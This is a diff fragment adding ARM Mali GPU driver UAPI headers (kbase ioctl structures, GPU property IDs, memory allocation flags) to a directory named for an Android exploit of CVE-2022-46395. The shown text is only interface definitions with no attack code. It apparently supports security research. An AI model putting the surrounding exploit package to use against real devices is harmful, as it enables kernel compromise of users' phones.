+ * 00 = __u8
+ * 01 = __u16
+ * 10 = __u32
+ * 11 = __u64
+ */
+struct kbase_ioctl_get_gpuprops {
+ __u64 buffer;
+ __u32 size;
+ __u32 flags;
+};
+
+#define KBASE_IOCTL_GET_GPUPROPS \
+ _IOW(KBASE_IOCTL_TYPE, 3, struct kbase_ioctl_get_gpuprops)
+
+/**
+ * union kbase_ioctl_mem_alloc - Allocate memory on the GPU
+ * @in: Input parameters
+ * @in.va_pages: The number of pages of virtual address space to reserve
+ * @in.commit_pages: The number of physical pages to allocate
+ * @in.extension: The number of extra pages to allocate on each GPU fault which grows the region
+ * @in.flags: Flags
+ * @out: Output parameters
+ * @out.flags: Flags
+ * @out.gpu_va: The GPU virtual address which is allocated
+ */
+union kbase_ioctl_mem_alloc {
+ struct {
+ __u64 va_pages;
+ __u64 commit_pages;
+ __u64 extension;
+ __u64 flags;
+ } in;
+ struct {
+ __u64 flags;
+ __u64 gpu_va;
+ } out;
+};
+
+#define KBASE_IOCTL_MEM_ALLOC \
+ _IOWR(KBASE_IOCTL_TYPE, 5, union kbase_ioctl_mem_alloc)
+
+/**
+ * struct kbase_ioctl_mem_query - Query properties of a GPU memory region
+ * @in: Input parameters
+ * @in.gpu_addr: A GPU address contained within the region
+ * @in.query: The type of query
+ * @out: Output parameters
+ * @out.value: The result of the query
+ *
+ * Use a %KBASE_MEM_QUERY_xxx flag as input for @query.
+ */
+union kbase_ioctl_mem_query {
+ struct {
+ __u64 gpu_addr;
+ __u64 query;
+ } in;
+ struct {
+ __u64 value;
+ } out;
+};
+
+#define KBASE_IOCTL_MEM_QUERY \
+ _IOWR(KBASE_IOCTL_TYPE, 6, union kbase_ioctl_mem_query)
+
+#define KBASE_MEM_QUERY_COMMIT_SIZE ((__u64)1)
+#define KBASE_MEM_QUERY_VA_SIZE ((__u64)2)
+#define KBASE_MEM_QUERY_FLAGS ((__u64)3)
+
+/**
+ * struct kbase_ioctl_mem_free - Free a memory region
+ * @gpu_addr: Handle to the region to free
+ */
+struct kbase_ioctl_mem_free {
+ __u64 gpu_addr;
+};
+
+#define KBASE_IOCTL_MEM_FREE \
+ _IOW(KBASE_IOCTL_TYPE, 7, struct kbase_ioctl_mem_free)
+
+/**
+ * struct kbase_ioctl_hwcnt_reader_setup - Setup HWC dumper/reader
+ * @buffer_count: requested number of dumping buffers
+ * @fe_bm: counters selection bitmask (Front end)
+ * @shader_bm: counters selection bitmask (Shader)
+ * @tiler_bm: counters selection bitmask (Tiler)
+ * @mmu_l2_bm: counters selection bitmask (MMU_L2)
+ *
+ * A fd is returned from the ioctl if successful, or a negative value on error
+ */
+struct kbase_ioctl_hwcnt_reader_setup {
+ __u32 buffer_count;
+ __u32 fe_bm;
+ __u32 shader_bm;
+ __u32 tiler_bm;
+ __u32 mmu_l2_bm;
+};
+
+#define KBASE_IOCTL_HWCNT_READER_SETUP \
+ _IOW(KBASE_IOCTL_TYPE, 8, struct kbase_ioctl_hwcnt_reader_setup)
+
+/**
+ * struct kbase_ioctl_hwcnt_enable - Enable hardware counter collection
+ * @dump_buffer: GPU address to write counters to
+ * @fe_bm: counters selection bitmask (Front end)
+ * @shader_bm: counters selection bitmask (Shader)
+ * @tiler_bm: counters selection bitmask (Tiler)
+ * @mmu_l2_bm: counters selection bitmask (MMU_L2)
+ */
+struct kbase_ioctl_hwcnt_enable {
+ __u64 dump_buffer;
+ __u32 fe_bm;
+ __u32 shader_bm;
+ __u32 tiler_bm;
+ __u32 mmu_l2_bm;
+};
+
+#define KBASE_IOCTL_HWCNT_ENABLE \
+ _IOW(KBASE_IOCTL_TYPE, 9, struct kbase_ioctl_hwcnt_enable)
+
+#define KBASE_IOCTL_HWCNT_DUMP \
+ _IO(KBASE_IOCTL_TYPE, 10)
+
+#define KBASE_IOCTL_HWCNT_CLEAR \
+ _IO(KBASE_IOCTL_TYPE, 11)
+
+/**
+ * struct kbase_ioctl_hwcnt_values - Values to set dummy the dummy counters to.
+ * @data: Counter samples for the dummy model.
+ * @size: Size of the counter sample data.
+ * @padding: Padding.
+ */
+struct kbase_ioctl_hwcnt_values {
+ __u64 data;
+ __u32 size;
+ __u32 padding;
+};
+
+#define KBASE_IOCTL_HWCNT_SET \
+ _IOW(KBASE_IOCTL_TYPE, 32, struct kbase_ioctl_hwcnt_values)
+
+/**
+ * struct kbase_ioctl_disjoint_query - Query the disjoint counter
+ * @counter: A counter of disjoint events in the kernel
+ */
+struct kbase_ioctl_disjoint_query {
+ __u32 counter;
+};
+
+#define KBASE_IOCTL_DISJOINT_QUERY \
+ _IOR(KBASE_IOCTL_TYPE, 12, struct kbase_ioctl_disjoint_query)
+
+/**
+ * struct kbase_ioctl_get_ddk_version - Query the kernel version
+ * @version_buffer: Buffer to receive the kernel version string
+ * @size: Size of the buffer
+ * @padding: Padding
+ *
+ * The ioctl will return the number of bytes written into version_buffer
+ * (which includes a NULL byte) or a negative error code
+ *
+ * The ioctl request code has to be _IOW because the data in ioctl struct is
+ * being copied to the kernel, even though the kernel then writes out the
+ * version info to the buffer specified in the ioctl.
+ */
+struct kbase_ioctl_get_ddk_version {
+ __u64 version_buffer;
+ __u32 size;
+ __u32 padding;
+};
+
+#define KBASE_IOCTL_GET_DDK_VERSION \
+ _IOW(KBASE_IOCTL_TYPE, 13, struct kbase_ioctl_get_ddk_version)
+
+/**
+ * struct kbase_ioctl_mem_jit_init_10_2 - Initialize the just-in-time memory
+ * allocator (between kernel driver
+ * version 10.2--11.4)
+ * @va_pages: Number of VA pages to reserve for JIT
+ *
+ * Note that depending on the VA size of the application and GPU, the value
+ * specified in @va_pages may be ignored.
+ *
+ * New code should use KBASE_IOCTL_MEM_JIT_INIT instead, this is kept for
+ * backwards compatibility.
+ */
+struct kbase_ioctl_mem_jit_init_10_2 {
+ __u64 va_pages;
+};
+
+#define KBASE_IOCTL_MEM_JIT_INIT_10_2 \
+ _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init_10_2)
+
+/**
+ * struct kbase_ioctl_mem_jit_init_11_5 - Initialize the just-in-time memory
+ * allocator (between kernel driver
+ * version 11.5--11.19)
+ * @va_pages: Number of VA pages to reserve for JIT
+ * @max_allocations: Maximum number of concurrent allocations
+ * @trim_level: Level of JIT allocation trimming to perform on free (0 - 100%)
+ * @group_id: Group ID to be used for physical allocations
+ * @padding: Currently unused, must be zero
+ *
+ * Note that depending on the VA size of the application and GPU, the value
+ * specified in @va_pages may be ignored.
+ *
+ * New code should use KBASE_IOCTL_MEM_JIT_INIT instead, this is kept for
+ * backwards compatibility.
+ */
+struct kbase_ioctl_mem_jit_init_11_5 {
+ __u64 va_pages;
+ __u8 max_allocations;
+ __u8 trim_level;
+ __u8 group_id;
+ __u8 padding[5];
+};
+
+#define KBASE_IOCTL_MEM_JIT_INIT_11_5 \
+ _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init_11_5)
+
+/**
+ * struct kbase_ioctl_mem_jit_init - Initialize the just-in-time memory
+ * allocator
+ * @va_pages: Number of GPU virtual address pages to reserve for just-in-time
+ * memory allocations
+ * @max_allocations: Maximum number of concurrent allocations
+ * @trim_level: Level of JIT allocation trimming to perform on free (0 - 100%)
+ * @group_id: Group ID to be used for physical allocations
+ * @padding: Currently unused, must be zero
+ * @phys_pages: Maximum number of physical pages to allocate just-in-time
+ *
+ * Note that depending on the VA size of the application and GPU, the value
+ * specified in @va_pages may be ignored.
+ */
+struct kbase_ioctl_mem_jit_init {
+ __u64 va_pages;
+ __u8 max_allocations;
+ __u8 trim_level;
+ __u8 group_id;
+ __u8 padding[5];
+ __u64 phys_pages;
+};
+
+#define KBASE_IOCTL_MEM_JIT_INIT \
+ _IOW(KBASE_IOCTL_TYPE, 14, struct kbase_ioctl_mem_jit_init)
+
+/**
+ * struct kbase_ioctl_mem_sync - Perform cache maintenance on memory
+ *
+ * @handle: GPU memory handle (GPU VA)
+ * @user_addr: The address where it is mapped in user space
+ * @size: The number of bytes to synchronise
+ * @type: The direction to synchronise: 0 is sync to memory (clean),
+ * 1 is sync from memory (invalidate). Use the BASE_SYNCSET_OP_xxx constants.
+ * @padding: Padding to round up to a multiple of 8 bytes, must be zero
+ */
+struct kbase_ioctl_mem_sync {
+ __u64 handle;
+ __u64 user_addr;
+ __u64 size;
+ __u8 type;
+ __u8 padding[7];
+};
+
+#define KBASE_IOCTL_MEM_SYNC \
+ _IOW(KBASE_IOCTL_TYPE, 15, struct kbase_ioctl_mem_sync)
+
+/**
+ * union kbase_ioctl_mem_find_cpu_offset - Find the offset of a CPU pointer
+ *
+ * @in: Input parameters
+ * @in.gpu_addr: The GPU address of the memory region
+ * @in.cpu_addr: The CPU address to locate
+ * @in.size: A size in bytes to validate is contained within the region
+ * @out: Output parameters
+ * @out.offset: The offset from the start of the memory region to @cpu_addr
+ */
+union kbase_ioctl_mem_find_cpu_offset {
+ struct {
+ __u64 gpu_addr;
+ __u64 cpu_addr;
+ __u64 size;
+ } in;
+ struct {
+ __u64 offset;
+ } out;
+};
+
+#define KBASE_IOCTL_MEM_FIND_CPU_OFFSET \
+ _IOWR(KBASE_IOCTL_TYPE, 16, union kbase_ioctl_mem_find_cpu_offset)
+
+/**
+ * struct kbase_ioctl_get_context_id - Get the kernel context ID
+ *
+ * @id: The kernel context ID
+ */
+struct kbase_ioctl_get_context_id {
+ __u32 id;
+};
+
+#define KBASE_IOCTL_GET_CONTEXT_ID \
+ _IOR(KBASE_IOCTL_TYPE, 17, struct kbase_ioctl_get_context_id)
+
+/**
+ * struct kbase_ioctl_tlstream_acquire - Acquire a tlstream fd
+ *
+ * @flags: Flags
+ *
+ * The ioctl returns a file descriptor when successful
+ */
+struct kbase_ioctl_tlstream_acquire {
+ __u32 flags;
+};
+
+#define KBASE_IOCTL_TLSTREAM_ACQUIRE \
+ _IOW(KBASE_IOCTL_TYPE, 18, struct kbase_ioctl_tlstream_acquire)
+
+#define KBASE_IOCTL_TLSTREAM_FLUSH \
+ _IO(KBASE_IOCTL_TYPE, 19)
+
+/**
+ * struct kbase_ioctl_mem_commit - Change the amount of memory backing a region
+ *
+ * @gpu_addr: The memory region to modify
+ * @pages: The number of physical pages that should be present
+ *
+ * The ioctl may return on the following error codes or 0 for success:
+ * -ENOMEM: Out of memory
+ * -EINVAL: Invalid arguments
+ */
+struct kbase_ioctl_mem_commit {
+ __u64 gpu_addr;
+ __u64 pages;
+};
+
+#define KBASE_IOCTL_MEM_COMMIT \
+ _IOW(KBASE_IOCTL_TYPE, 20, struct kbase_ioctl_mem_commit)
+
+/**
+ * union kbase_ioctl_mem_alias - Create an alias of memory regions
+ * @in: Input parameters
+ * @in.flags: Flags, see BASE_MEM_xxx
+ * @in.stride: Bytes between start of each memory region
+ * @in.nents: The number of regions to pack together into the alias
+ * @in.aliasing_info: Pointer to an array of struct base_mem_aliasing_info
+ * @out: Output parameters
+ * @out.flags: Flags, see BASE_MEM_xxx
+ * @out.gpu_va: Address of the new alias
+ * @out.va_pages: Size of the new alias
+ */
+union kbase_ioctl_mem_alias {
+ struct {
+ __u64 flags;
+ __u64 stride;
+ __u64 nents;
+ __u64 aliasing_info;
+ } in;
+ struct {
+ __u64 flags;
+ __u64 gpu_va;
+ __u64 va_pages;
+ } out;
+};
+
+#define KBASE_IOCTL_MEM_ALIAS \
+ _IOWR(KBASE_IOCTL_TYPE, 21, union kbase_ioctl_mem_alias)
+
+enum base_mem_import_type {
+ BASE_MEM_IMPORT_TYPE_INVALID = 0,
+ /*
+ * Import type with value 1 is deprecated.
+ */
+ BASE_MEM_IMPORT_TYPE_UMM = 2,
+ BASE_MEM_IMPORT_TYPE_USER_BUFFER = 3
+};
+
+/**
+ * struct base_mem_import_user_buffer - Handle of an imported user buffer
+ *
+ * @ptr: address of imported user buffer
+ * @length: length of imported user buffer in bytes
+ *
+ * This structure is used to represent a handle of an imported user buffer.
+ */
+
+struct base_mem_import_user_buffer {
+ __u64 ptr;
+ __u64 length;
+};
+
+/**
+ * union kbase_ioctl_mem_import - Import memory for use by the GPU
+ * @in: Input parameters
+ * @in.flags: Flags, see BASE_MEM_xxx
+ * @in.phandle: Handle to the external memory
+ * @in.type: Type of external memory, see base_mem_import_type
+ * @in.padding: Amount of extra VA pages to append to the imported buffer
+ * @out: Output parameters
+ * @out.flags: Flags, see BASE_MEM_xxx
+ * @out.gpu_va: Address of the new alias
+ * @out.va_pages: Size of the new alias
+ */
+union kbase_ioctl_mem_import {
+ struct {
+ __u64 flags;
+ __u64 phandle;
+ __u32 type;
+ __u32 padding;
+ } in;
+ struct {
+ __u64 flags;
+ __u64 gpu_va;
+ __u64 va_pages;
+ } out;
+};
+
+#define KBASE_IOCTL_MEM_IMPORT \
+ _IOWR(KBASE_IOCTL_TYPE, 22, union kbase_ioctl_mem_import)
+
+/**
+ * struct kbase_ioctl_mem_flags_change - Change the flags for a memory region
+ * @gpu_va: The GPU region to modify
+ * @flags: The new flags to set
+ * @mask: Mask of the flags to modify
+ */
+struct kbase_ioctl_mem_flags_change {
+ __u64 gpu_va;
+ __u64 flags;
+ __u64 mask;
+};
+
+#define KBASE_IOCTL_MEM_FLAGS_CHANGE \
+ _IOW(KBASE_IOCTL_TYPE, 23, struct kbase_ioctl_mem_flags_change)
+
+/**
+ * struct kbase_ioctl_stream_create - Create a synchronisation stream
+ * @name: A name to identify this stream. Must be NULL-terminated.
+ *
+ * Note that this is also called a "timeline", but is named stream to avoid
+ * confusion with other uses of the word.
+ *
+ * Unused bytes in @name (after the first NULL byte) must be also be NULL bytes.
+ *
+ * The ioctl returns a file descriptor.
+ */
+struct kbase_ioctl_stream_create {
+ char name[32];
+};
+
+#define KBASE_IOCTL_STREAM_CREATE \
+ _IOW(KBASE_IOCTL_TYPE, 24, struct kbase_ioctl_stream_create)
+
+/**
+ * struct kbase_ioctl_fence_validate - Validate a fd refers to a fence
+ * @fd: The file descriptor to validate
+ */
+struct kbase_ioctl_fence_validate {
+ int fd;
+};
+
+#define KBASE_IOCTL_FENCE_VALIDATE \
+ _IOW(KBASE_IOCTL_TYPE, 25, struct kbase_ioctl_fence_validate)
+
+/**
+ * struct kbase_ioctl_mem_profile_add - Provide profiling information to kernel
+ * @buffer: Pointer to the information
+ * @len: Length
+ * @padding: Padding
+ *
+ * The data provided is accessible through a debugfs file
+ */
+struct kbase_ioctl_mem_profile_add {
+ __u64 buffer;
+ __u32 len;
+ __u32 padding;
+};
+
+#define KBASE_IOCTL_MEM_PROFILE_ADD \
+ _IOW(KBASE_IOCTL_TYPE, 27, struct kbase_ioctl_mem_profile_add)
+
+/**
+ * struct kbase_ioctl_sticky_resource_map - Permanently map an external resource
+ * @count: Number of resources
+ * @address: Array of __u64 GPU addresses of the external resources to map
+ */
+struct kbase_ioctl_sticky_resource_map {
+ __u64 count;
+ __u64 address;
+};
+
+#define KBASE_IOCTL_STICKY_RESOURCE_MAP \
+ _IOW(KBASE_IOCTL_TYPE, 29, struct kbase_ioctl_sticky_resource_map)
+
+/**
+ * struct kbase_ioctl_sticky_resource_map - Unmap a resource mapped which was
+ * previously permanently mapped
+ * @count: Number of resources
+ * @address: Array of __u64 GPU addresses of the external resources to unmap
+ */
+struct kbase_ioctl_sticky_resource_unmap {
+ __u64 count;
+ __u64 address;
+};
+
+#define KBASE_IOCTL_STICKY_RESOURCE_UNMAP \
+ _IOW(KBASE_IOCTL_TYPE, 30, struct kbase_ioctl_sticky_resource_unmap)
+
+/**
+ * union kbase_ioctl_mem_find_gpu_start_and_offset - Find the start address of
+ * the GPU memory region for
+ * the given gpu address and
+ * the offset of that address
+ * into the region
+ * @in: Input parameters
+ * @in.gpu_addr: GPU virtual address
+ * @in.size: Size in bytes within the region
+ * @out: Output parameters
+ * @out.start: Address of the beginning of the memory region enclosing @gpu_addr
+ * for the length of @offset bytes
+ * @out.offset: The offset from the start of the memory region to @gpu_addr
+ */
+union kbase_ioctl_mem_find_gpu_start_and_offset {
+ struct {
+ __u64 gpu_addr;
+ __u64 size;
+ } in;
+ struct {
+ __u64 start;
+ __u64 offset;
+ } out;
+};
+
+#define KBASE_IOCTL_MEM_FIND_GPU_START_AND_OFFSET \
+ _IOWR(KBASE_IOCTL_TYPE, 31, union kbase_ioctl_mem_find_gpu_start_and_offset)
+
+#define KBASE_IOCTL_CINSTR_GWT_START \
+ _IO(KBASE_IOCTL_TYPE, 33)
+
+#define KBASE_IOCTL_CINSTR_GWT_STOP \
+ _IO(KBASE_IOCTL_TYPE, 34)
+
+/**
+ * union kbase_ioctl_gwt_dump - Used to collect all GPU write fault addresses.
+ * @in: Input parameters
+ * @in.addr_buffer: Address of buffer to hold addresses of gpu modified areas.
+ * @in.size_buffer: Address of buffer to hold size of modified areas (in pages)
+ * @in.len: Number of addresses the buffers can hold.
+ * @in.padding: padding
+ * @out: Output parameters
+ * @out.no_of_addr_collected: Number of addresses collected into addr_buffer.
+ * @out.more_data_available: Status indicating if more addresses are available.
+ * @out.padding: padding
+ *
+ * This structure is used when performing a call to dump GPU write fault
+ * addresses.
+ */
+union kbase_ioctl_cinstr_gwt_dump {
+ struct {
+ __u64 addr_buffer;
+ __u64 size_buffer;
+ __u32 len;
+ __u32 padding;
+
+ } in;
+ struct {
+ __u32 no_of_addr_collected;
+ __u8 more_data_available;
+ __u8 padding[27];
+ } out;
+};
+
+#define KBASE_IOCTL_CINSTR_GWT_DUMP \
+ _IOWR(KBASE_IOCTL_TYPE, 35, union kbase_ioctl_cinstr_gwt_dump)
+
+/**
+ * struct kbase_ioctl_mem_exec_init - Initialise the EXEC_VA memory zone
+ *
+ * @va_pages: Number of VA pages to reserve for EXEC_VA
+ */
+struct kbase_ioctl_mem_exec_init {
+ __u64 va_pages;
+};
+
+#define KBASE_IOCTL_MEM_EXEC_INIT \
+ _IOW(KBASE_IOCTL_TYPE, 38, struct kbase_ioctl_mem_exec_init)
+
+/**
+ * union kbase_ioctl_get_cpu_gpu_timeinfo - Request zero or more types of
+ * cpu/gpu time (counter values)
+ * @in: Input parameters
+ * @in.request_flags: Bit-flags indicating the requested types.
+ * @in.paddings: Unused, size alignment matching the out.
+ * @out: Output parameters
+ * @out.sec: Integer field of the monotonic time, unit in seconds.
+ * @out.nsec: Fractional sec of the monotonic time, in nano-seconds.
+ * @out.padding: Unused, for __u64 alignment
+ * @out.timestamp: System wide timestamp (counter) value.
+ * @out.cycle_counter: GPU cycle counter value.
+ */
+union kbase_ioctl_get_cpu_gpu_timeinfo {
+ struct {
+ __u32 request_flags;
+ __u32 paddings[7];
+ } in;
+ struct {
+ __u64 sec;
+ __u32 nsec;
+ __u32 padding;
+ __u64 timestamp;
+ __u64 cycle_counter;
+ } out;
+};
+
+#define KBASE_IOCTL_GET_CPU_GPU_TIMEINFO \
+ _IOWR(KBASE_IOCTL_TYPE, 50, union kbase_ioctl_get_cpu_gpu_timeinfo)
+
+/**
+ * struct kbase_ioctl_context_priority_check - Check the max possible priority
+ * @priority: Input priority & output priority
+ */
+
+struct kbase_ioctl_context_priority_check {
+ __u8 priority;
+};
+
+#define KBASE_IOCTL_CONTEXT_PRIORITY_CHECK \
+ _IOWR(KBASE_IOCTL_TYPE, 54, struct kbase_ioctl_context_priority_check)
+
+/**
+ * struct kbase_ioctl_set_limited_core_count - Set the limited core count.
+ *
+ * @max_core_count: Maximum core count
+ */
+struct kbase_ioctl_set_limited_core_count {
+ __u8 max_core_count;
+};
+
+#define KBASE_IOCTL_SET_LIMITED_CORE_COUNT \
+ _IOW(KBASE_IOCTL_TYPE, 55, struct kbase_ioctl_set_limited_core_count)
+
+
+/***************
+ * Pixel ioctls *
+ ***************/
+
+/**
+ * struct kbase_ioctl_apc_request - GPU asynchronous power control (APC) request
+ *
+ * @dur_usec: Duration for GPU to stay awake.
+ */
+struct kbase_ioctl_apc_request {
+ __u32 dur_usec;
+};
+
+#define KBASE_IOCTL_APC_REQUEST \
+ _IOW(KBASE_IOCTL_TYPE, 66, struct kbase_ioctl_apc_request)
+
+/***************
+ * test ioctls *
+ ***************/
+#if MALI_UNIT_TEST
+/* These ioctls are purely for test purposes and are not used in the production
+ * driver, they therefore may change without notice
+ */
+
+#define KBASE_IOCTL_TEST_TYPE (KBASE_IOCTL_TYPE + 1)
+
+
+/**
+ * struct kbase_ioctl_tlstream_stats - Read tlstream stats for test purposes
+ * @bytes_collected: number of bytes read by user
+ * @bytes_generated: number of bytes generated by tracepoints
+ */
+struct kbase_ioctl_tlstream_stats {
+ __u32 bytes_collected;
+ __u32 bytes_generated;
+};
+
+#define KBASE_IOCTL_TLSTREAM_STATS \
+ _IOR(KBASE_IOCTL_TEST_TYPE, 2, struct kbase_ioctl_tlstream_stats)
+
+#endif /* MALI_UNIT_TEST */
+
+/* Customer extension range */
+#define KBASE_IOCTL_EXTRA_TYPE (KBASE_IOCTL_TYPE + 2)
+
+/* If the integration needs extra ioctl add them there
+ * like this:
+ *
+ * struct my_ioctl_args {
+ * ....
+ * }
+ *
+ * #define KBASE_IOCTL_MY_IOCTL \
+ * _IOWR(KBASE_IOCTL_EXTRA_TYPE, 0, struct my_ioctl_args)
+ */
+
+
+/**********************************
+ * Definitions for GPU properties *
+ **********************************/
+#define KBASE_GPUPROP_VALUE_SIZE_U8 (0x0)
+#define KBASE_GPUPROP_VALUE_SIZE_U16 (0x1)
+#define KBASE_GPUPROP_VALUE_SIZE_U32 (0x2)
+#define KBASE_GPUPROP_VALUE_SIZE_U64 (0x3)
+
+#define KBASE_GPUPROP_PRODUCT_ID 1
+#define KBASE_GPUPROP_VERSION_STATUS 2
+#define KBASE_GPUPROP_MINOR_REVISION 3
+#define KBASE_GPUPROP_MAJOR_REVISION 4
+/* 5 previously used for GPU speed */
+#define KBASE_GPUPROP_GPU_FREQ_KHZ_MAX 6
+/* 7 previously used for minimum GPU speed */
+#define KBASE_GPUPROP_LOG2_PROGRAM_COUNTER_SIZE 8
+#define KBASE_GPUPROP_TEXTURE_FEATURES_0 9
+#define KBASE_GPUPROP_TEXTURE_FEATURES_1 10
+#define KBASE_GPUPROP_TEXTURE_FEATURES_2 11
+#define KBASE_GPUPROP_GPU_AVAILABLE_MEMORY_SIZE 12
+
+#define KBASE_GPUPROP_L2_LOG2_LINE_SIZE 13
+#define KBASE_GPUPROP_L2_LOG2_CACHE_SIZE 14
+#define KBASE_GPUPROP_L2_NUM_L2_SLICES 15
+
+#define KBASE_GPUPROP_TILER_BIN_SIZE_BYTES 16
+#define KBASE_GPUPROP_TILER_MAX_ACTIVE_LEVELS 17
+
+#define KBASE_GPUPROP_MAX_THREADS 18
+#define KBASE_GPUPROP_MAX_WORKGROUP_SIZE 19
+#define KBASE_GPUPROP_MAX_BARRIER_SIZE 20
+#define KBASE_GPUPROP_MAX_REGISTERS 21
+#define KBASE_GPUPROP_MAX_TASK_QUEUE 22
+#define KBASE_GPUPROP_MAX_THREAD_GROUP_SPLIT 23
+#define KBASE_GPUPROP_IMPL_TECH 24
+
+#define KBASE_GPUPROP_RAW_SHADER_PRESENT 25
+#define KBASE_GPUPROP_RAW_TILER_PRESENT 26
+#define KBASE_GPUPROP_RAW_L2_PRESENT 27
+#define KBASE_GPUPROP_RAW_STACK_PRESENT 28
+#define KBASE_GPUPROP_RAW_L2_FEATURES 29
+#define KBASE_GPUPROP_RAW_CORE_FEATURES 30
+#define KBASE_GPUPROP_RAW_MEM_FEATURES 31
+#define KBASE_GPUPROP_RAW_MMU_FEATURES 32
+#define KBASE_GPUPROP_RAW_AS_PRESENT 33
+#define KBASE_GPUPROP_RAW_JS_PRESENT 34
+#define KBASE_GPUPROP_RAW_JS_FEATURES_0 35
+#define KBASE_GPUPROP_RAW_JS_FEATURES_1 36
+#define KBASE_GPUPROP_RAW_JS_FEATURES_2 37
+#define KBASE_GPUPROP_RAW_JS_FEATURES_3 38
+#define KBASE_GPUPROP_RAW_JS_FEATURES_4 39
+#define KBASE_GPUPROP_RAW_JS_FEATURES_5 40
+#define KBASE_GPUPROP_RAW_JS_FEATURES_6 41
+#define KBASE_GPUPROP_RAW_JS_FEATURES_7 42
+#define KBASE_GPUPROP_RAW_JS_FEATURES_8 43
+#define KBASE_GPUPROP_RAW_JS_FEATURES_9 44
+#define KBASE_GPUPROP_RAW_JS_FEATURES_10 45
+#define KBASE_GPUPROP_RAW_JS_FEATURES_11 46
+#define KBASE_GPUPROP_RAW_JS_FEATURES_12 47
+#define KBASE_GPUPROP_RAW_JS_FEATURES_13 48
+#define KBASE_GPUPROP_RAW_JS_FEATURES_14 49
+#define KBASE_GPUPROP_RAW_JS_FEATURES_15 50
+#define KBASE_GPUPROP_RAW_TILER_FEATURES 51
+#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_0 52
+#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_1 53
+#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_2 54
+#define KBASE_GPUPROP_RAW_GPU_ID 55
+#define KBASE_GPUPROP_RAW_THREAD_MAX_THREADS 56
+#define KBASE_GPUPROP_RAW_THREAD_MAX_WORKGROUP_SIZE 57
+#define KBASE_GPUPROP_RAW_THREAD_MAX_BARRIER_SIZE 58
+#define KBASE_GPUPROP_RAW_THREAD_FEATURES 59
+#define KBASE_GPUPROP_RAW_COHERENCY_MODE 60
+
+#define KBASE_GPUPROP_COHERENCY_NUM_GROUPS 61
+#define KBASE_GPUPROP_COHERENCY_NUM_CORE_GROUPS 62
+#define KBASE_GPUPROP_COHERENCY_COHERENCY 63
+#define KBASE_GPUPROP_COHERENCY_GROUP_0 64
+#define KBASE_GPUPROP_COHERENCY_GROUP_1 65
+#define KBASE_GPUPROP_COHERENCY_GROUP_2 66
+#define KBASE_GPUPROP_COHERENCY_GROUP_3 67
+#define KBASE_GPUPROP_COHERENCY_GROUP_4 68
+#define KBASE_GPUPROP_COHERENCY_GROUP_5 69
+#define KBASE_GPUPROP_COHERENCY_GROUP_6 70
+#define KBASE_GPUPROP_COHERENCY_GROUP_7 71
+#define KBASE_GPUPROP_COHERENCY_GROUP_8 72
+#define KBASE_GPUPROP_COHERENCY_GROUP_9 73
+#define KBASE_GPUPROP_COHERENCY_GROUP_10 74
+#define KBASE_GPUPROP_COHERENCY_GROUP_11 75
+#define KBASE_GPUPROP_COHERENCY_GROUP_12 76
+#define KBASE_GPUPROP_COHERENCY_GROUP_13 77
+#define KBASE_GPUPROP_COHERENCY_GROUP_14 78
+#define KBASE_GPUPROP_COHERENCY_GROUP_15 79
+
+#define KBASE_GPUPROP_TEXTURE_FEATURES_3 80
+#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_3 81
+
+#define KBASE_GPUPROP_NUM_EXEC_ENGINES 82
+
+#define KBASE_GPUPROP_RAW_THREAD_TLS_ALLOC 83
+#define KBASE_GPUPROP_TLS_ALLOC 84
+#define KBASE_GPUPROP_RAW_GPU_FEATURES 85
+
+#define BASE_MEM_MAP_TRACKING_HANDLE (3ull << 12)
+
+#endif /* _UAPI_KBASE_JM_IOCTL_H_ */
+
diff --git a/SecurityExploits/Android/Mali/CVE_2022_46395/mali_base_jm_kernel.h b/SecurityExploits/Android/Mali/CVE_2022_46395/mali_base_jm_kernel.h
new file mode 100644
index 0000000..5edc780
--- /dev/null
+++ b/SecurityExploits/Android/Mali/CVE_2022_46395/mali_base_jm_kernel.h
@@ -0,0 +1,1220 @@
+/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */
+/*
+ *
+ * (C) COPYRIGHT 2019-2021 ARM Limited. All rights reserved.
+ *
+ * This program is free software and is provided to you under the terms of the
+ * GNU General Public License version 2 as published by the Free Software
+ * Foundation, and any use by you of this program is subject to the terms
+ * of such GNU license.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program; if not, you can access it online at
+ * http://www.gnu.org/licenses/gpl-2.0.html.
+ *
+ */
+
+#ifndef _UAPI_BASE_JM_KERNEL_H_
+#define _UAPI_BASE_JM_KERNEL_H_
+
+#include
+
+typedef __u32 base_mem_alloc_flags;
+/* Memory allocation, access/hint flags.
+ *
+ * See base_mem_alloc_flags.
+ */
+
+/* IN */
+/* Read access CPU side
+ */
+#define BASE_MEM_PROT_CPU_RD ((base_mem_alloc_flags)1 << 0)
+
+/* Write access CPU side
+ */
+#define BASE_MEM_PROT_CPU_WR ((base_mem_alloc_flags)1 << 1)
+
+/* Read access GPU side
+ */
+#define BASE_MEM_PROT_GPU_RD ((base_mem_alloc_flags)1 << 2)
+
+/* Write access GPU side
+ */
+#define BASE_MEM_PROT_GPU_WR ((base_mem_alloc_flags)1 << 3)
+
+/* Execute allowed on the GPU side
+ */
+#define BASE_MEM_PROT_GPU_EX ((base_mem_alloc_flags)1 << 4)
+
+/* Will be permanently mapped in kernel space.
+ * Flag is only allowed on allocations originating from kbase.
+ */
+#define BASEP_MEM_PERMANENT_KERNEL_MAPPING ((base_mem_alloc_flags)1 << 5)
+
+/* The allocation will completely reside within the same 4GB chunk in the GPU
+ * virtual space.
+ * Since this flag is primarily required only for the TLS memory which will
+ * not be used to contain executable code and also not used for Tiler heap,
+ * it can't be used along with BASE_MEM_PROT_GPU_EX and TILER_ALIGN_TOP flags.
+ */
+#define BASE_MEM_GPU_VA_SAME_4GB_PAGE ((base_mem_alloc_flags)1 << 6)
+
+/* Userspace is not allowed to free this memory.
+ * Flag is only allowed on allocations originating from kbase.
+ */
+#define BASEP_MEM_NO_USER_FREE ((base_mem_alloc_flags)1 << 7)
+
